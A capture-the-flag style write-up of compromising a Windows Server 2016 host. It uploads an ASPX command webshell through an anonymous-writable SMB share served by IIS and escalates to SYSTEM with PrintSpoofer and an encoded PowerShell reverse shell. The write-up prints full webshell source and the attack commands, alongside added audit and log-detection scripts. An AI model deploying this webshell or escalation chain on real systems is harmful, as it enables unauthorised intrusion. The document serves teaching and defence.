Overview
Windows Server 2016 with an SMB share (nt4wrksv) that allows anonymous write access — and is mapped directly to the IIS web root on port 49663. Upload an ASPX webshell via SMB, get code execution as IIS AppPool, then escalate to SYSTEM via SeImpersonatePrivilege + PrintSpoofer.
Reconnaissance
Port Scan
```bash
nmap -sC -sV -T4 TARGET
```
| Port | Service | Notes |
|---|---|---|
| 80/tcp | IIS 10.0 | Default IIS page |
| 135/tcp | MSRPC | Standard |
| 139/tcp | NetBIOS | SMB discovery |
| 445/tcp | SMB | Windows Server 2016 |
| 3389/tcp | RDP | Remote Desktop |
| 49663/tcp | IIS 10.0 | Second IIS instance — serves SMB share |
SMB Enumeration
```bash
smbclient -L //TARGET/ -N
# Sharename: ADMIN$  IPC$  C$  nt4wrksv
```
The nt4wrksv share is readable anonymously, contains passwords.txt (base64-encoded decoy credentials), and also allows anonymous write access.
Critical Discovery
The nt4wrksv share is mapped to the IIS webroot at http://TARGET:49663/nt4wrksv/. Files written via SMB are directly served over HTTP — webshell upload path confirmed.
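The condition above (an SMB share whose path sits inside an IIS site's physical root, writable by untrusted principals) is easy to audit once the share and site inventories are in hand. The script below is an added example, not code from the writeup: it takes a share list in the shape Get-SmbShare / Get-SmbShareAccess would give and an IIS site list, normalises Windows paths, and reports shares that are served over HTTP, rated critical when an untrusted principal can write into them. The inventory is constructed to match this host; the site names and the port-80 physical path are assumptions.

```python
"""Audit helper (added example): find SMB shares served by IIS and flag
untrusted write access. Inventory is constructed, not collected from the box."""
import ntpath
from dataclasses import dataclass


@dataclass(frozen=True)
class Share:
    name: str
    path: str      # local filesystem path; "" for IPC$
    acl: tuple     # ((account, right), ...) as Get-SmbShareAccess reports


@dataclass(frozen=True)
class Site:
    name: str
    port: int
    physical_path: str


WRITE_RIGHTS = {"Full", "Change"}   # SMB share rights that permit writes
# Principals that should never be able to write into a web root.
# Authenticated Users is included: any account with a password could drop files.
UNTRUSTED = {"everyone", "anonymous logon", "guests", "authenticated users"}


def _norm(path):
    """Canonical Windows path: backslashes, lower case, no trailing separator."""
    return ntpath.normcase(ntpath.normpath(path)).rstrip("\\")


def is_under(child, parent):
    """True when child is parent itself or lies beneath it (case-insensitive)."""
    c, p = _norm(child), _norm(parent)
    return c == p or c.startswith(p + "\\")


def untrusted_writers(share):
    return [acct for acct, right in share.acl
            if acct.lower() in UNTRUSTED and right in WRITE_RIGHTS]


def find_web_exposed_shares(shares, sites):
    """One finding per share that lies inside an IIS site's physical path.
    'critical' when an untrusted principal can write there (a file dropped
    over SMB becomes server-side code), otherwise 'info'."""
    findings = []
    for share in shares:
        if not share.path:                  # IPC$ has no filesystem path
            continue
        served_by = []
        for site in sites:
            if is_under(share.path, site.physical_path):
                rel = _norm(share.path)[len(_norm(site.physical_path)):]
                url_path = "/" + rel.strip("\\").replace("\\", "/")
                served_by.append((site.name, site.port, url_path.rstrip("/") + "/"))
        if not served_by:
            continue
        writers = untrusted_writers(share)
        findings.append({
            "share": share.name,
            "path": share.path,
            "severity": "critical" if writers else "info",
            "untrusted_writers": writers,
            "served_by": served_by,
        })
    return findings


# Constructed inventory for the host in the writeup (site names and the
# port-80 physical path are assumptions, not values from the box).
SHARES = [
    Share("ADMIN$", "C:\\Windows", (("BUILTIN\\Administrators", "Full"),)),
    Share("C$", "C:\\", (("BUILTIN\\Administrators", "Full"),)),
    Share("IPC$", "", ()),
    Share("nt4wrksv", "C:\\inetpub\\wwwroot\\nt4wrksv", (("Everyone", "Full"),)),
]
SITES = [
    Site("Default Web Site", 80, "C:\\inetpub\\default"),   # assumed path
    Site("ShareSite", 49663, "C:\\inetpub\\wwwroot"),       # serves nt4wrksv
]

if __name__ == "__main__":
    for finding in find_web_exposed_shares(SHARES, SITES):
        print(finding)
```

Running it prints a single critical finding for nt4wrksv, served at /nt4wrksv/ on port 49663 and writable by Everyone; ADMIN$ and C$ are not under any site root and IPC$ is skipped. The path comparison uses ntpath deliberately so the check behaves the same whether it runs on the Windows host or on an analyst's Linux machine against exported inventories.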
Foothold — ASPX Webshell
Webshell Creation
```aspx
<%@ Page Language="C#" %>
<%@ Import Namespace="System.Diagnostics" %>
<%
    // Command to run arrives in the "cmd" query-string parameter
    string cmd = Request["cmd"];
    Process p = new Process();
    p.StartInfo.FileName = "cmd.exe";
    p.StartInfo.Arguments = "/c " + cmd;
    p.StartInfo.UseShellExecute = false;        // required to capture stdout
    p.StartInfo.RedirectStandardOutput = true;
    p.Start();
    // Command output is returned in the HTTP response body
    Response.Write("<pre>" + p.StandardOutput.ReadToEnd() + "</pre>");
%>
```
Upload via SMB
```bash
smbclient //TARGET/nt4wrksv -N -c "put shell.aspx"
```
Verify RCE
```bash
curl "http://TARGET:49663/nt4wrksv/shell.aspx?cmd=whoami"
# iis apppool\defaultapppool
```
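Every one of these webshell interactions lands in the IIS W3C log of the site on 49663, which makes this foothold detectable after the fact. The script below is an added example, not part of the writeup: it parses a W3C log excerpt by its #Fields header and raises an alert when a server-side script is successfully requested under a share-backed URL prefix, or when a query string carries command-like content. The log lines are constructed to mirror the requests in this writeup (timestamps, IPs and user agents are made up), and the /nt4wrksv/ prefix is assumed to be known from a share audit.

```python
"""Detection over IIS W3C logs (added example). Log excerpt is constructed."""
import re
from urllib.parse import unquote_plus

# URL prefixes backed by writable SMB shares (assumed known from an audit).
WRITABLE_URL_PREFIXES = ("/nt4wrksv/",)
# Extensions IIS hands to a script engine; a request for one of these under a
# writable prefix means uploaded content is being executed server-side.
SCRIPT_EXT = (".aspx", ".asp", ".ashx", ".asmx")
# Crude but effective signal for command strings smuggled through a parameter.
COMMAND_RE = re.compile(
    r"(?i)\b(whoami|cmd|powershell|net user|certutil|reg add)\b|\.exe\b"
)

# Constructed excerpt; not a real log from the box.
IIS_LOG = """\
#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2024-05-01 10:14:02 10.10.10.5 GET / - 49663 - 10.10.14.3 Mozilla/5.0 - 200 0 0 12
2024-05-01 10:15:20 10.10.10.5 GET /nt4wrksv/passwords.txt - 49663 - 10.10.14.3 curl/8.5.0 - 200 0 0 4
2024-05-01 10:18:45 10.10.10.5 GET /nt4wrksv/shell.aspx cmd=whoami 49663 - 10.10.14.3 curl/8.5.0 - 200 0 0 633
2024-05-01 10:19:10 10.10.10.5 GET /nt4wrksv/shell.aspx cmd=whoami%20/priv 49663 - 10.10.14.3 curl/8.5.0 - 200 0 0 402
2024-05-01 10:22:31 10.10.10.5 GET /nt4wrksv/shell.aspx cmd=C:%5Cinetpub%5Cwwwroot%5Cnt4wrksv%5CPrintSpoofer64.exe%20-i%20-c%20%22cmd%20/c%20powershell%20-e%20%3CB64%3E%22 49663 - 10.10.14.3 curl/8.5.0 - 200 0 0 5210
2024-05-01 10:30:00 10.10.10.5 GET /nt4wrksv/notes.aspx - 49663 - 10.10.14.3 Mozilla/5.0 - 404 0 2 1
"""


def parse_w3c(text):
    """Return one dict per entry, keyed by the names in the #Fields header."""
    fields, rows = None, []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line.startswith("#") or not line.strip():
            continue
        elif fields:
            rows.append(dict(zip(fields, line.split(" "))))
    return rows


def analyze(rows):
    """Apply both rules to every entry; return alerts with their reasons."""
    alerts = []
    for i, r in enumerate(rows, 1):
        stem = r["cs-uri-stem"].lower()
        query = unquote_plus(r["cs-uri-query"]) if r["cs-uri-query"] != "-" else ""
        status = int(r["sc-status"])
        reasons = []
        # Rule 1: script executed from a path attackers can write over SMB.
        # A 404 probe is noise for this rule, so gate on a successful response.
        if stem.startswith(WRITABLE_URL_PREFIXES) and stem.endswith(SCRIPT_EXT) \
                and status < 400:
            reasons.append("script-executed-from-writable-share-path")
        # Rule 2: decoded query string looks like an OS command.
        if query and COMMAND_RE.search(query):
            reasons.append("command-like-query")
        if reasons:
            alerts.append({"row": i, "client": r["c-ip"], "stem": r["cs-uri-stem"],
                           "query": query, "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for alert in analyze(parse_w3c(IIS_LOG)):
        print(alert)
```

On this excerpt rows 3 to 5 (the whoami, whoami /priv and PrintSpoofer requests) trigger both rules, while the passwords.txt download and the 404 for notes.aspx stay quiet. Decoding with unquote_plus matters: IIS logs the query as the client sent it, so the PrintSpoofer path and the -e flag only become visible after percent-decoding.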
Privilege Escalation
SeImpersonatePrivilege
```text
?cmd=whoami /priv
SeImpersonatePrivilege    Enabled
```
Impersonation → SYSTEM
SeImpersonatePrivilege is held by default by IIS application pool identities and other Windows service accounts; it lets a process impersonate the security token of a client that has authenticated to it. PrintSpoofer abuses the Print Spooler service to obtain such a token for SYSTEM and escalate to it.
PrintSpoofer Upload & Execution
```bash
# Upload via the same writable share
smbclient //TARGET/nt4wrksv -N -c "put PrintSpoofer64.exe"
# Listener on the attacking host
nc -lvnp 4444
```
Trigger through the webshell (query string passed to shell.aspx):
```text
?cmd=C:\inetpub\wwwroot\nt4wrksv\PrintSpoofer64.exe -i -c "cmd /c powershell -e <B64_REVSHELL>"
```
Result: SYSTEM shell received on listener
```bash
type C:\Users\Administrator\Desktop\root.txt
```
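The process tree this chain leaves behind is the other strong detection opportunity: w3wp.exe spawning cmd.exe, a binary executing from the web root, a named pipe created by something descended from the web server, and finally a SYSTEM-level process whose ancestry runs back to the IIS worker. The script below is an added example, not from the writeup: it builds parent/child lineage from Sysmon-style ProcessCreate (Event ID 1) and PipeCreated (Event ID 17) records and applies those four rules. The events are constructed to model this writeup's activity (GUIDs, command lines and the pipe name are made up, not real telemetry from the box).

```python
"""Process-lineage detection over Sysmon-style events (added example).
Events below are constructed, not collected from the box."""
import ntpath

WEB_SERVER = "w3wp.exe"
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
WEB_ROOT = "C:\\inetpub\\wwwroot"
SYSTEM = "nt authority\\system"

# Constructed Sysmon-style records: id 1 = ProcessCreate, id 17 = PipeCreated.
EVENTS = [
    {"id": 1, "guid": "S1", "parent": "K", "image": "C:\\Windows\\System32\\svchost.exe",
     "user": "NT AUTHORITY\\SYSTEM", "cmdline": "svchost.exe -k iissvcs"},
    {"id": 1, "guid": "W", "parent": "S1", "image": "C:\\Windows\\System32\\inetsrv\\w3wp.exe",
     "user": "IIS APPPOOL\\DefaultAppPool", "cmdline": "w3wp.exe -ap \"DefaultAppPool\""},
    {"id": 1, "guid": "C1", "parent": "W", "image": "C:\\Windows\\System32\\cmd.exe",
     "user": "IIS APPPOOL\\DefaultAppPool", "cmdline": "cmd.exe /c whoami"},
    {"id": 1, "guid": "C2", "parent": "W", "image": "C:\\Windows\\System32\\cmd.exe",
     "user": "IIS APPPOOL\\DefaultAppPool",
     "cmdline": "cmd.exe /c C:\\inetpub\\wwwroot\\nt4wrksv\\PrintSpoofer64.exe -i -c <B64_REVSHELL>"},
    {"id": 1, "guid": "P", "parent": "C2",
     "image": "C:\\inetpub\\wwwroot\\nt4wrksv\\PrintSpoofer64.exe",
     "user": "IIS APPPOOL\\DefaultAppPool", "cmdline": "PrintSpoofer64.exe -i -c <B64_REVSHELL>"},
    {"id": 17, "guid": "P", "image": "C:\\inetpub\\wwwroot\\nt4wrksv\\PrintSpoofer64.exe",
     "pipe": "\\pipe\\constructed-example"},
    {"id": 1, "guid": "S2", "parent": "P", "image": "C:\\Windows\\System32\\cmd.exe",
     "user": "NT AUTHORITY\\SYSTEM", "cmdline": "cmd /c powershell -e <B64_REVSHELL>"},
    {"id": 1, "guid": "N", "parent": "E", "image": "C:\\Windows\\System32\\notepad.exe",
     "user": "RELEVANT\\bob", "cmdline": "notepad.exe"},   # benign control
]


def _norm(path):
    return ntpath.normcase(ntpath.normpath(path)).rstrip("\\")


def ancestors(procs, guid):
    """Image basenames of the process's ancestors, nearest parent first.
    Stops at unknown parents and guards against cycles in bad telemetry."""
    out, seen = [], set()
    cur = procs[guid]["parent"] if guid in procs else None
    while cur in procs and cur not in seen:
        seen.add(cur)
        out.append(ntpath.basename(procs[cur]["image"]).lower())
        cur = procs[cur]["parent"]
    return out


def detect(events):
    """Return (guid, rule) pairs for every event that matches a rule."""
    procs = {e["guid"]: e for e in events if e["id"] == 1}
    alerts = []
    for e in events:
        name = ntpath.basename(e["image"]).lower()
        lineage = ancestors(procs, e["guid"])
        from_web = WEB_SERVER in lineage
        if e["id"] == 1:
            # Webshell signature: the IIS worker directly spawning a shell.
            if lineage and lineage[0] == WEB_SERVER and name in SHELLS:
                alerts.append((e["guid"], "web-server-spawned-shell"))
            # Nothing under the web root should ever run as a program.
            if _norm(e["image"]).startswith(_norm(WEB_ROOT) + "\\"):
                alerts.append((e["guid"], "exec-from-web-root"))
            # Privilege jump: web-server lineage now running as SYSTEM.
            if from_web and e["user"].lower() == SYSTEM:
                alerts.append((e["guid"], "web-lineage-running-as-system"))
        elif e["id"] == 17 and from_web:
            # Impersonation tooling needs a pipe it owns for the coerced
            # service to connect to; web-server descendants have no reason to.
            alerts.append((e["guid"], "web-lineage-created-named-pipe"))
    return alerts


if __name__ == "__main__":
    for alert in detect(EVENTS):
        print(alert)
```

On the constructed events the two cmd.exe children of w3wp.exe, the binary running from the share directory, its named pipe, and the SYSTEM shell under it each produce exactly one alert; the svchost.exe record (SYSTEM, but not web lineage) and the notepad.exe control produce none. The lineage walk is what makes the last rule work: the SYSTEM cmd.exe is three hops away from w3wp.exe, so a parent-only check would miss it.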
Lessons Learned
- Anonymous SMB write + web-served share = instant webshell. Always check if SMB shares map to web-accessible directories.
- SeImpersonatePrivilege = SYSTEM. On Windows service accounts (IIS, MSSQL, etc.), this privilege enables PrintSpoofer, JuicyPotato, or RoguePotato for guaranteed escalation.
- Check all ports. The second IIS instance on 49663 was the actual attack surface, not port 80.
Tools Used
| Tool | Purpose |
|---|---|
| nmap | Port scanning & service detection |
| smbclient | SMB enumeration & file upload |
| curl | Webshell interaction |
| PrintSpoofer64 | SeImpersonatePrivilege → SYSTEM |
| netcat | Reverse shell listener |